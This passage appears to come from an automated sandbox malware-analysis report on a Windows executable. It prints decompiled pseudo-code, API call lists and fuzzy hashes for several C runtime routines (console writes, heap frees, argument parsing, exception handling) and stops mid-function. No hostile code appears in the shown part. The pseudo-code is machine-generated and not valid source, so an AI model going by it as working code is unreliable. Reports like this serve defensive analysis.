                                                                                                                                                                          0x00a12a7a
                                                                                                                                                                          0x00a12a80

                                                                                                                                                                          APIs
                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00A11097,00000000,00000001,00000000,00000000,?,00A07C75,?,?,00000000), ref: 00A12A43
                                                                                                                                                                          • GetLastError.KERNEL32(?,00A11097,00000000,00000001,00000000,00000000,?,00A07C75,?,?,00000000,?,00000000,?,00A081C1,?), ref: 00A12A4F
                                                                                                                                                                            • Part of subcall function 00A12A15: CloseHandle.KERNEL32(FFFFFFFE,00A12A5F,?,00A11097,00000000,00000001,00000000,00000000,?,00A07C75,?,?,00000000,?,00000000), ref: 00A12A25
                                                                                                                                                                          • ___initconout.LIBCMT ref: 00A12A5F
                                                                                                                                                                            • Part of subcall function 00A129D7: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00A12A06,00A11084,00000000,?,00A07C75,?,?,00000000,?), ref: 00A129EA
                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00A11097,00000000,00000001,00000000,00000000,?,00A07C75,?,?,00000000,?), ref: 00A12A74
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2744216297-0
                                                                                                                                                                          • Opcode ID: 89d11e8a5f88ca079a60b4473f6098eaa1efcc3638f6366a0d8ae0c2cec8a341
                                                                                                                                                                          • Instruction ID: df917d2579f57972ee6eab9c7ea37421f49d75b656370980a3869505616c9426
                                                                                                                                                                          • Opcode Fuzzy Hash: 89d11e8a5f88ca079a60b4473f6098eaa1efcc3638f6366a0d8ae0c2cec8a341
                                                                                                                                                                          • Instruction Fuzzy Hash: 6BF0AC3A541158BBCF225FE5EC04ADD3F66EF4D3A1F048120FA5895131D732C8A19B95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A033A8 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00A033A8() {

				E00A0447F( *0xa4651c);
				 *0xa4651c = 0;
				E00A0447F( *0xa46520);
				 *0xa46520 = 0;
				E00A0447F( *0xa464dc);
				 *0xa464dc = 0;
				E00A0447F( *0xa464e0);
				 *0xa464e0 = 0;
				return 1;
			}



                                                                                                                                                                          0x00a033b1
                                                                                                                                                                          0x00a033be
                                                                                                                                                                          0x00a033c4
                                                                                                                                                                          0x00a033cf
                                                                                                                                                                          0x00a033d5
                                                                                                                                                                          0x00a033e0
                                                                                                                                                                          0x00a033e6
                                                                                                                                                                          0x00a033ee
                                                                                                                                                                          0x00a033f7

                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00A033B1
                                                                                                                                                                            • Part of subcall function 00A0447F: HeapFree.KERNEL32(00000000,00000000,?,00A0D2F5,?,00000000,?,00000002,?,00A0D598,?,00000007,?,?,00A0DA8B,?), ref: 00A04495
                                                                                                                                                                            • Part of subcall function 00A0447F: GetLastError.KERNEL32(?,?,00A0D2F5,?,00000000,?,00000002,?,00A0D598,?,00000007,?,?,00A0DA8B,?,?), ref: 00A044A7
                                                                                                                                                                          • _free.LIBCMT ref: 00A033C4
                                                                                                                                                                          • _free.LIBCMT ref: 00A033D5
                                                                                                                                                                          • _free.LIBCMT ref: 00A033E6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 2a2fc2dd7695de567eb4989c67b89e344e60e73f4286deef8efad8c077a12ea0
                                                                                                                                                                          • Instruction ID: a9b3ab856f21cd4304325847b38b8a166723f60c27516326ceae4a985f62db99
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a2fc2dd7695de567eb4989c67b89e344e60e73f4286deef8efad8c077a12ea0
                                                                                                                                                                          • Instruction Fuzzy Hash: CAE0B6FD8001249BCA12EFA5BE415493E26B7DFB003018006F65456279D73706279F8B
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A005FD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 00A0068D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                                                                          • String ID: pow
                                                                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                                                                          • Opcode ID: 3792b7e69818db2da25f5f304269010a382517aaa49306f80f25c6723a62d6fd
                                                                                                                                                                          • Instruction ID: f4553c4cb38495946537d1b1acd51d9a708ff1abf680d4a21752c5d706448107
                                                                                                                                                                          • Opcode Fuzzy Hash: 3792b7e69818db2da25f5f304269010a382517aaa49306f80f25c6723a62d6fd
                                                                                                                                                                          • Instruction Fuzzy Hash: CD517071B0870D9ACB11B714FE417BA3BA5DBA1740F208D69E0D5421E5EF7A8CA1DB43
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A00F2F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                          			E00A00F2F(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E00A0C1EA(_t48);
						E00A0BC31(_t48, _t57, 0, 0xa463b0, 0, 0xa463b0, 0x104);
						_t26 =  *0xa464e4; // 0xb72398
						 *0xa464d4 = 0xa463b0;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0xa463b0;
							_v20 = 0xa463b0;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E00A011D9(E00A01065( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E00A01065( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E00A0BB5F(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0xa464d8 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0xa464dc = _t58;
											L18:
											E00A0447F(_t37);
											_v12 = 0;
											L19:
											E00A0447F(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0xa464d8 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0xa464dc = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E009FEBAB(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E009FEBAB(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E009FCBCF();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

























                                                                                                                                                                          0x00a00f2f
                                                                                                                                                                          0x00a00f38
                                                                                                                                                                          0x00a00f3d
                                                                                                                                                                          0x00a00f47
                                                                                                                                                                          0x00a00f4a
                                                                                                                                                                          0x00a00f67
                                                                                                                                                                          0x00a00f68
                                                                                                                                                                          0x00a00f7b
                                                                                                                                                                          0x00a00f80
                                                                                                                                                                          0x00a00f88
                                                                                                                                                                          0x00a00f8e
                                                                                                                                                                          0x00a00f91
                                                                                                                                                                          0x00a00f93
                                                                                                                                                                          0x00a00f9a
                                                                                                                                                                          0x00a00f9a
                                                                                                                                                                          0x00a00f9c
                                                                                                                                                                          0x00a00f9f
                                                                                                                                                                          0x00a00fa2
                                                                                                                                                                          0x00a00fa9
                                                                                                                                                                          0x00a00fc2
                                                                                                                                                                          0x00a00fc7
                                                                                                                                                                          0x00a00fc9
                                                                                                                                                                          0x00a00fea
                                                                                                                                                                          0x00a00ff2
                                                                                                                                                                          0x00a00ff5
                                                                                                                                                                          0x00a01010
                                                                                                                                                                          0x00a01013
                                                                                                                                                                          0x00a0101a
                                                                                                                                                                          0x00a0101e
                                                                                                                                                                          0x00a01020
                                                                                                                                                                          0x00a01027
                                                                                                                                                                          0x00a0102a
                                                                                                                                                                          0x00a0102c
                                                                                                                                                                          0x00a0102e
                                                                                                                                                                          0x00a01030
                                                                                                                                                                          0x00a0103a
                                                                                                                                                                          0x00a0103a
                                                                                                                                                                          0x00a0103c
                                                                                                                                                                          0x00a01042
                                                                                                                                                                          0x00a01045
                                                                                                                                                                          0x00a01047
                                                                                                                                                                          0x00a0104d
                                                                                                                                                                          0x00a0104e
                                                                                                                                                                          0x00a01054
                                                                                                                                                                          0x00a01057
                                                                                                                                                                          0x00a01058
                                                                                                                                                                          0x00a0105e
                                                                                                                                                                          0x00a01061
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a01032
                                                                                                                                                                          0x00a01032
                                                                                                                                                                          0x00a01032
                                                                                                                                                                          0x00a01035
                                                                                                                                                                          0x00a01036
                                                                                                                                                                          0x00a01036
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a01032
                                                                                                                                                                          0x00a01022
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a01022
                                                                                                                                                                          0x00a00ffa
                                                                                                                                                                          0x00a00ffa
                                                                                                                                                                          0x00a00ffb
                                                                                                                                                                          0x00a01000
                                                                                                                                                                          0x00a01002
                                                                                                                                                                          0x00a01004
                                                                                                                                                                          0x00a01009
                                                                                                                                                                          0x00a01009
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a01009
                                                                                                                                                                          0x00a00fcb
                                                                                                                                                                          0x00a00fd0
                                                                                                                                                                          0x00a00fd2
                                                                                                                                                                          0x00a00fd3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a00fd3
                                                                                                                                                                          0x00a00f95
                                                                                                                                                                          0x00a00f98
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a00f98
                                                                                                                                                                          0x00a00f4c
                                                                                                                                                                          0x00a00f4f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a00f51
                                                                                                                                                                          0x00a00f58
                                                                                                                                                                          0x00a00f59
                                                                                                                                                                          0x00a00f5b
                                                                                                                                                                          0x00a00f60
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a00f60
                                                                                                                                                                          0x00000000

                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: C:\Users\user\Desktop\file.exe
                                                                                                                                                                          • API String ID: 0-3695852857
                                                                                                                                                                          • Opcode ID: e18c60612f41137663063a58a0d7e15bc9bf0dbd3ab03b6d97f87f596900789e
                                                                                                                                                                          • Instruction ID: ea26e1da3677a5f286e7f5b913f7695d2a7a5a051fcb4dd73b0d710ee4f2b284
                                                                                                                                                                          • Opcode Fuzzy Hash: e18c60612f41137663063a58a0d7e15bc9bf0dbd3ab03b6d97f87f596900789e
                                                                                                                                                                          • Instruction Fuzzy Hash: BE41A275E0025CAFCB21EF99ED81EAEBBB8EB86310F100066F505E7291D7718A41DB51
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009FB4F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                          			E009FB4F0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E00A13A12(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0xa44bac;
				E009FB4B0(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0xa44bac);
				E009FC57C(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E009FC700(_t77, 0xfffffffe, _t96, 0xa44bac);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E009FC6A0(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E009FB4B0(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0xa1597c;
											if(__eflags != 0) {
												_t72 = E00A132E0(__eflags, 0xa1597c);
												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0xa1597c; // 0x9fa3de
													 *0xa1413c(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E009FC6E0(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E009FC700(_t64, _t93, _t96, 0xa44bac);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E009FB4B0(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E009FC6C0();
										asm("int3");
										__eflags = E009FC717();
										if(__eflags != 0) {
											_t67 = E009FB7B3(_t86, __eflags);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E009FC753();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}





























                                                                                                                                                                          0x009fb4f0
                                                                                                                                                                          0x009fb4f7
                                                                                                                                                                          0x009fb4fb
                                                                                                                                                                          0x009fb4fc
                                                                                                                                                                          0x009fb502
                                                                                                                                                                          0x009fb50e
                                                                                                                                                                          0x009fb510
                                                                                                                                                                          0x009fb516
                                                                                                                                                                          0x009fb516
                                                                                                                                                                          0x009fb51f
                                                                                                                                                                          0x009fb521
                                                                                                                                                                          0x009fb524
                                                                                                                                                                          0x009fb527
                                                                                                                                                                          0x009fb52f
                                                                                                                                                                          0x009fb534
                                                                                                                                                                          0x009fb537
                                                                                                                                                                          0x009fb53a
                                                                                                                                                                          0x009fb541
                                                                                                                                                                          0x009fb59d
                                                                                                                                                                          0x009fb5a0
                                                                                                                                                                          0x009fb5a8
                                                                                                                                                                          0x009fb5af
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb5af
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb543
                                                                                                                                                                          0x009fb543
                                                                                                                                                                          0x009fb549
                                                                                                                                                                          0x009fb54f
                                                                                                                                                                          0x009fb555
                                                                                                                                                                          0x009fb5c0
                                                                                                                                                                          0x009fb5c9
                                                                                                                                                                          0x009fb557
                                                                                                                                                                          0x009fb557
                                                                                                                                                                          0x009fb557
                                                                                                                                                                          0x009fb55d
                                                                                                                                                                          0x009fb560
                                                                                                                                                                          0x009fb563
                                                                                                                                                                          0x009fb566
                                                                                                                                                                          0x009fb569
                                                                                                                                                                          0x009fb56e
                                                                                                                                                                          0x009fb584
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb570
                                                                                                                                                                          0x009fb570
                                                                                                                                                                          0x009fb572
                                                                                                                                                                          0x009fb577
                                                                                                                                                                          0x009fb579
                                                                                                                                                                          0x009fb57c
                                                                                                                                                                          0x009fb57e
                                                                                                                                                                          0x009fb594
                                                                                                                                                                          0x009fb5b4
                                                                                                                                                                          0x009fb5b4
                                                                                                                                                                          0x009fb5b8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb580
                                                                                                                                                                          0x009fb580
                                                                                                                                                                          0x009fb5ca
                                                                                                                                                                          0x009fb5cd
                                                                                                                                                                          0x009fb5d3
                                                                                                                                                                          0x009fb5d5
                                                                                                                                                                          0x009fb5dc
                                                                                                                                                                          0x009fb5e3
                                                                                                                                                                          0x009fb5e8
                                                                                                                                                                          0x009fb5eb
                                                                                                                                                                          0x009fb5ed
                                                                                                                                                                          0x009fb5ef
                                                                                                                                                                          0x009fb5fc
                                                                                                                                                                          0x009fb602
                                                                                                                                                                          0x009fb604
                                                                                                                                                                          0x009fb607
                                                                                                                                                                          0x009fb607
                                                                                                                                                                          0x009fb60a
                                                                                                                                                                          0x009fb60a
                                                                                                                                                                          0x009fb5dc
                                                                                                                                                                          0x009fb610
                                                                                                                                                                          0x009fb612
                                                                                                                                                                          0x009fb617
                                                                                                                                                                          0x009fb61a
                                                                                                                                                                          0x009fb61d
                                                                                                                                                                          0x009fb625
                                                                                                                                                                          0x009fb629
                                                                                                                                                                          0x009fb62e
                                                                                                                                                                          0x009fb62e
                                                                                                                                                                          0x009fb631
                                                                                                                                                                          0x009fb635
                                                                                                                                                                          0x009fb638
                                                                                                                                                                          0x009fb645
                                                                                                                                                                          0x009fb648
                                                                                                                                                                          0x009fb64d
                                                                                                                                                                          0x009fb653
                                                                                                                                                                          0x009fb655
                                                                                                                                                                          0x009fb65a
                                                                                                                                                                          0x009fb65f
                                                                                                                                                                          0x009fb661
                                                                                                                                                                          0x009fb66c
                                                                                                                                                                          0x009fb663
                                                                                                                                                                          0x009fb663
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb663
                                                                                                                                                                          0x009fb657
                                                                                                                                                                          0x009fb657
                                                                                                                                                                          0x009fb657
                                                                                                                                                                          0x009fb659
                                                                                                                                                                          0x009fb659
                                                                                                                                                                          0x009fb582
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb582
                                                                                                                                                                          0x009fb580
                                                                                                                                                                          0x009fb57e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb587
                                                                                                                                                                          0x009fb587
                                                                                                                                                                          0x009fb589
                                                                                                                                                                          0x009fb590
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb592
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb590
                                                                                                                                                                          0x009fb555
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 009FB52F
                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 009FB5E3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                          • String ID: csm
                                                                                                                                                                          • API String ID: 3480331319-1018135373
                                                                                                                                                                          • Opcode ID: 19380358ffe37883596653be0933a5ffcb794b8698bbba2b0b1060eed606bf0d
                                                                                                                                                                          • Instruction ID: 59bddc6d96c9366aa736560c23510f0171998ba883cd43d08ebc9a42f3e80f92
                                                                                                                                                                          • Opcode Fuzzy Hash: 19380358ffe37883596653be0933a5ffcb794b8698bbba2b0b1060eed606bf0d
                                                                                                                                                                          • Instruction Fuzzy Hash: C041A374A0020DABCF10DF69C884AAEBBB5AF85324F14C155FA14AB392D735EA15CF91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009FBE02 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                          			E009FBE02(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_t75 = E009FB6DC(_t96, __ecx, __edx, _t113, _t121, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E009FB6DC(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E009F99F8(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E009F992B(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
